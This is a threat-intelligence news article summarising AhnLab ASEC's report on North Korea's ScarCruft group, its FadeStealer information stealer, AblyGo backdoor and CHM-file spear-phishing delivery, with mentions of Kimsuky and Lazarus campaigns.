FadeStealer Employed by ScarCruft APT

The North Korean threat group ScarCruft has recently been observed utilizing a previously undisclosed information-stealing malware that includes wiretapping capabilities. Additionally, they have developed a backdoor using Golang, exploiting the Ably real-time messaging service.

A technical report from the AhnLab Security Emergency Response Center (ASEC) stated that the threat actor employed the Ably service to transmit their commands through the Golang backdoor. The necessary API key for command communication was discovered to be stored in a GitHub repository.

ScarCruft, believed to be affiliated with North Korea's Ministry of State Security (MSS) and operating as a state-sponsored entity, has been active since at least 2012.

Their attack methodology typically involves spear-phishing campaigns to deliver the RokRAT malware, although they have also utilized various customized tools to gather sensitive information.

Malware Delivered in Microsoft Help File

In the most recent incident detected by ASEC, the malicious email contained a Microsoft Compiled HTML Help (.CHM) file. This technique, initially reported in March 2023, triggers contact with a remote server upon clicking, leading to the download of a PowerShell malware called Chinotto.

Chinotto, in addition to establishing persistence and retrieving additional payloads, introduces a backdoor known as AblyGo (also referred to as SidLevel by Kaspersky), which exploits the Ably API service for command-and-control purposes.

Furthermore, AblyGo serves as a conduit for executing FadeStealer, an information-stealing malware equipped with features such as capturing screenshots, collecting data from removable media and smartphones, logging keystrokes, and recording audio from microphones.

ASEC stated that the RedEyes group, to which ScarCruft belongs, specifically targets individuals such as North Korean defectors, human rights activists, and university professors, with the primary aim of stealing valuable information.

Unauthorized eavesdropping on individuals within South Korea is considered a violation of privacy and is strictly regulated under relevant laws. Nevertheless, the threat actors managed to monitor victims' activities on their computers and even conducted wiretapping.

CHM files have been observed being used by other North Korea-affiliated groups, including Kimsuky. SentinelOne recently disclosed a campaign in which the file format was employed to deliver a reconnaissance tool named RandomQuery.

In the latest set of attacks identified by ASEC, the CHM files are configured to drop a BAT file, which is subsequently used to download further-stage malware and exfiltrate user information from compromised hosts.

Spear-phishing, which has been the preferred initial access technique of Kimsuky for over a decade, typically involves extensive research and meticulous preparation, as highlighted in advisories from US and South Korean intelligence agencies.

These findings come in the wake of the Lazarus Group's exploitation of security vulnerabilities in widely-used South Korean software, including INISAFE CrossWeb EX, MagicLine4NX, TCO!Stream, and VestCert, as part of their active campaign to infiltrate companies and deploy malware.